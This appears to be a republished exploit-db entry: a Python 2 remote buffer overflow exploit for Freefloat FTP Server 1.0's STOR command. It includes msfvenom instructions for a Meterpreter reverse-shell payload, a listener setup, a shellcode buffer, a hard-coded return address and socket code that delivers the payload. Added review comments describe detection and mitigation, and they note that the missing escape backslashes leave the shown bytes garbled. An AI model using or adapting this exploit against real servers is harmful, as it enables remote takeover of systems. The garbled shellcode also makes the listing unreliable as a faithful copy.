
Published on May 1st, 2019 📆 | 3067 Views ⚑


Freefloat FTP Server 1.0 – ‘STOR’ Remote Buffer Overflow



# Exploit Title: Free Float FTP 1.0 "STOR" Remote Buffer Overflow
# Google Dork: N/A
# Date: 4/26/2019
# Exploit Author: Kevin Randall
# Vendor Homepage:
# Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
# Version: Firmware: Free Float FTP 1.0
# Tested on: Windows XP Professional Service Pack 2
# CVE : N/A

#Generate Shellcode with MSFVenom
#msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP.OF.LOCAL.MACHINE LPORT=4444 -b 'x00x0Ax0D' -f python
#Setup listener "use exploit/multi/handler" "set payload windows/meterpreter/reverse_tcp" "set LHOST IP.OF.LOCAL.MACHINE" "set LPORT 4444" "exploit"

#!/usr/bin/python

import socket
import sys

# Payload construction for the STOR argument.
#
# `buf` is the encoder output from the msfvenom command quoted in the header
# (windows/meterpreter/reverse_tcp). It is opaque generated data and is kept
# here exactly as the page shows it.
#
# NOTE(review): as rendered on this page the escape backslashes are missing,
# so the string literals below do not hold the byte values the author's
# original would have. Treat the listing as a reference for the advisory,
# not as a verified artifact.
buf =  ""
buf += "xbax99x2cxb1x7dxdbxd1xd9x74x24xf4x5dx2b"
buf += "xc9xb1x56x31x55x13x83xedxfcx03x55x96xce"
buf += "x44x81x40x8cxa7x7ax90xf1x2ex9fxa1x31x54"
buf += "xebx91x81x1exb9x1dx69x72x2ax96x1fx5bx5d"
buf += "x1fx95xbdx50xa0x86xfexf3x22xd5xd2xd3x1b"
buf += "x16x27x15x5cx4bxcax47x35x07x79x78x32x5d"
buf += "x42xf3x08x73xc2xe0xd8x72xe3xb6x53x2dx23"
buf += "x38xb0x45x6ax22xd5x60x24xd9x2dx1exb7x0b"
buf += "x7cxdfx14x72xb1x12x64xb2x75xcdx13xcax86"
buf += "x70x24x09xf5xaexa1x8ax5dx24x11x77x5cxe9"
buf += "xc4xfcx52x46x82x5bx76x59x47xd0x82xd2x66"
buf += "x37x03xa0x4cx93x48x72xecx82x34xd5x11xd4"
buf += "x97x8axb7x9ex35xdexc5xfcx51x13xe4xfexa1"
buf += "x3bx7fx8cx93xe4x2bx1ax9fx6dxf2xddx96x7a"
buf += "x05x31x10xeaxfbxb2x60x22x38xe6x30x5cxe9"
buf += "x87xdbx9cx16x52x71x97x80x9dx2dxa7x52x76"
buf += "x2fxa8x43xdaxa6x4ex33xb2xe8xdexf4x62x48"
buf += "x8fx9cx68x47xf0xbdx92x82x99x54x7dx7axf1"
buf += "xc0xe4x27x89x71xe8xf2xf7xb2x62xf6x08x7c"
buf += "x83x73x1bx69xf4x7bxe3x6ax91x7bx89x6ex33"
buf += "x2cx25x6dx62x1axeax8ex41x19xedx71x14x2b"
buf += "x85x44x82x13xf1xa8x42x93x01xffx08x93x69"
buf += "xa7x68xc0x8cxa8xa4x75x1dx3dx47x2fxf1x96"
buf += "x2fxcdx2cxd0xefx2ex1bx62xf7xd0xd9x4dx50"
buf += "xb8x21xcex60x38x48xcex30x50x87xe1xbfx90"
buf += "x68x28xe8xb8xe3xbdx5ax59xf3x97x3bxc7xf4"
buf += "x14xe0xf8x8fx55x17xf9x6fx7cx7cxfax6fx80"
buf += "x82xc7xb9xb9xf0x06x7axfex0bx3dxdfx57x86"
buf += "x3dx73xa7x83"


# `shellcode` prefixes `buf` with twenty repetitions of the 'x90' literal.
shellcode = 'x90'*20 + buf
# `payload` is laid out as: 247 'A' filler characters, one hard-coded value,
# `shellcode`, then 'C' padding sized from 749 minus len(shellcode).
# NOTE(review): the hard-coded value is presumably the overwritten return
# address; together with the header's "Tested on: Windows XP Professional
# Service Pack 2" this suggests the listing is tied to one OS build - confirm.
# Defender's view: the result is a single FTP command line far longer than
# any file name, which is the observable to alert on in FTP traffic or server
# logs. The header lists "CVE : N/A", so scanners keyed on CVE ids may not
# flag this server; inventory it by product name and version instead.
payload = "A"*247+"xF6xC1xB3x7C"+ shellcode +"C"*(749-len(shellcode))

# Delivery sequence: one TCP connection to port 21 of a hard-coded private
# address, an anonymous login, a STOR command carrying `payload`, then QUIT.
# Every s.recv(1024) result is discarded, so server replies (including a
# rejected login) are never checked before the next command is sent.
# NOTE(review): str values are passed to send(), which matches Python 2
# usage - presumably the interpreter the shebang refers to; confirm.
# Defender's view: the script logs in as anonymous/anonymous before sending
# STOR. Whether the overflow is reachable without a successful login is not
# shown here, so disabling anonymous access should be treated as reducing
# exposure rather than as a fix; removing or replacing the affected server
# is the reliable mitigation.
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
##Add FTP Server IP Here###############
# s.connect() returns None; the `connect` name is not used afterwards.
connect = s.connect(('192.168.0.9',21))
#######################################

# Read and drop the server banner, then send the user name.
s.recv(1024)
s.send('USER anonymousrn')

# Read and drop the reply, then send the password.
s.recv(1024)
s.send('PASS anonymousrn')

# The oversized STOR argument is sent here, in a single send() call.
s.recv(1024)
s.send('STOR' + payload + 'rn')

# Close the session.
s.recv(1024)
s.send('QUITrn')

s.close()
            





https://www.exploit-db.com/exploits/46763
